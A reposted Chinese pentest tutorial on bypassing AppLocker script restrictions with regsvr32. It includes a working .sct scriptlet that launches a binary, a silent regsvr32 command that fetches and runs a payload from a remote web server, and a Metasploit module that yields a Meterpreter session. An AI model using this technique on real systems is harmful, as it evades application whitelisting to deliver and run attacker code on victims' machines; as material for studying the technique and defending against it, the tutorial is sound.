利用Regsvr32绕过Applocker的限制策略
转载于:http://www.freebuf.com/articl...
AppLocker的设计初衷就是为了帮助管理员Windows安装文件,可执行文件以及用户脚本的执行。从各种各样的奇淫巧计中我们得知这些限制是可以绕过的,例如在windows环境下通过AppLocker配置以限制脚本的执行,利用regsrv32命令行工具就可以完成绕过。
egsvr32是windows命令行实用工具用于注册动态链接库文件,向系统注册控件或者卸载控件的命令。Casey Smith发现通过调用regsrv32实用程序执行一条命令或者.sct文件有可能绕过AppLocker的脚本规则。由于该实用程序是由微软官方签名的所以好处多多啦,支持TLS加密,遵循重定向方式,不会在磁盘上留下痕迹。
以下脚本为Casey Smith提供的代码修改版,我们仅调用 calc.exe或cmd.exe。如果允许使用命令行提示符,脚本将在目标系统上执行自定义二进制代码:
<?XML version="1.0"?>
<scriptlet>
<registration
progid="Pentest"
classid="{F0001111-0000-0000-0000-0000FEEDACDC}" >
<script language="JScript"><![CDATA[
var r = new ActiveXObject("WScript.Shell").Run("cmd /k cd c:\ & pentestlab.exe");
]]></script>
</registration>
</scriptlet>
regsvr32实用工具可从托管的web服务器上请求以及执行脚本:
regsvr32 /u /n /s /i:http://ip:port/payload.sct scrobj.dll
regsrv32指令选项:
/s 静默执行
/n 指定不调用DllRegisterServer,此选项必须与/i共同使用
/i 调用DllInstall将它传递到可选的[cmdline],在与 /u 共同使用时,它调用DllUnstall
/u 反注册控件
当然也可以利用regsvr32在本地运行存储的有效载荷:
regsvr32 /u /n /s /i:payload.sct scrobj.dll
该命令将直接从托管文件的web服务器上执行脚本,嵌入.sct文件的JavaScript代码将引导pentestlab3.exe程序在命令提示符下执行。
由于pentestlab3是一个Metasploit payload,所以随后会打开一个Meterpreter会话:
当然,直接执行脚本还是会被拦截。但通过上面方法使用regsvr32进行绕过是可以的。
Metasploit
Metasploit框架有一个特定的有效载荷,可用于通过Regsvr32实用程序实现自动化绕过AppLocker
exploit/windows/misc/regsvr32_applocker_bypass_server
该模块将启用一个用于存储恶意.sct文件的web服务,同时也提供用于在目标系统下执行的命令
命令执行后regsvr32将从web服务器请求.sct文件,然后执行PowerShell payload
最后成功绕过绕过AppLocker限制
参考资源
https://www.rapid7.com/db/mod...
利用Regsvr32绕过Applocker的限制策略相关推荐
- 如何利用msxsl绕过AppLocker?
本文讲的是如何利用msxsl绕过AppLocker?, 0x00 前言 Casey Smith@subTee在twitter分享的一个技巧,使用包含微软签名的msxsl.exe能够执行JScript代 ...
- 绕过AppLocker系列之MSBuild的利用
本文讲的是绕过AppLocker系列之MSBuild的利用,Microsoft已经在.NET框架中发布了许多可以编译和执行代码的二进制文件.最初引入了MSBuild,以便开发人员在不安装Visual ...
- 利用python进行简单条件选股策略
标题: 利用python进行简单条件选股策略 """ 目的是如何用python演示条件选股. 根据标的公司所处的行业进行分类,从本行业中选出高成长性.净资产收益率高.估值 ...
- [CTF]利用CRC32绕过RAR密码(适合于小文本文件)
利用CRC32绕过RAR密码(适合于小文本文件) 原文标题:教你绕过rar密码 文章仅作rar密码破解的探讨,如有高见还望提出. 题目有点夸大其词,事实是我也没能想出一个更好的描述来总结这篇文章的内容 ...
- 利用Frida绕过Android App(途牛apk)的SSL Pinning
0x00 前言 做APP测试过程中,使用burp无法抓到数据包或提示网络错误可能是因为APP启用了SSL Pinning,刚好最近接触到途牛apk就是这种情况,于是便有了本文. 0x01 SSL Pi ...
- WEB 漏洞-XXEXML 之利用检测绕过
WEB 漏洞-XXE&XML 之利用检测绕过 XXE&XML DTD 内部DOCTYPE 声明 外部DOCTYPE声明 内部实体声明 外部实体声明 为什么使用 DTD pikachu ...
- 利用Spring AOP 更新memcached 缓存策略的实现(一)
本人参考文档:http://blog.csdn.net/ajun_studio/article/details/7343781 memcached批量删除解决方案:http://tech.ddvip. ...
- 利用win7的applocker功能来有组织的阻止相关软件运行
我有4年没用360相关的软件了,没有360的弹窗用电脑就是舒服.但是我的电脑有时候会有别人来用,我的同学或者我的父母.但是他们经常会自作主张地在我的电脑上装上360卫士,还有360浏览器.每次都是装了 ...
- ocx控件 postmessage消息会消失_通过HackerOne漏洞报告学习PostMessage漏洞实战场景中的利用与绕过...
0x00 前言 这是一篇关于postMessage漏洞分析的文章,主要通过hackerone平台披露的Bug Bounty报告,学习和分析postMessage漏洞如何在真实的场景中得到利用的. 0x ...
- ctfshow-萌新-web6( 利用二进制绕过获取网站敏感信息)
ctf.show 萌新模块 web6关,这一关的考点是intval()函数转换字符串的特性,以及SQL注入漏洞的绕过方式,源码中过滤了单双引号,or,加减乘除号,叹号,异或,hex,select等关键 ...
最新文章
- pythonbyte连接_Python3之字节串bytes与字节数组bytearray的使用详解
- Python中的对象,类,super()函数
- 存货编码数字_用友T3软件存货编码与存货代码有什么不同?
- mybatis完整增删改查入门实例
- freemarker写select组件报错总结(二)
- c语言结构体出现乱码,结构体数组输出时出现了乱码情况 求大神帮帮看程序
- 如何利用wordpress搭建自己独立的博客(个人网站)
- 国家缩写大全 mysql_各个国家的名称缩写和时区列表
- 计数器matlab,MATLAB中的几个时间计数器
- note20220227.docx
- EEE(Energy Efficient Ethernet)-节能以太网
- logo是啥_logo是什么意思 LOGO知识解读
- 少儿学python真的有用吗_如何看待海淀妈妈们认为Python是儿童才学的低端编程?...
- 电子元件-TVS与肖特基二极管
- 必备模块知识——继电器
- 用flatpak安装程序(比如GIMP)的方法
- 8. Android MultiMedia框架完全解析 - prepareAsync的过程分析
- 计网PPT 第五章 运输层
- 项目_基于Android的信息化医疗服务系统
- 百度竞价新项目;关键词该怎么出价呢?有没有一个能衡量出价的标准?出价多少算高?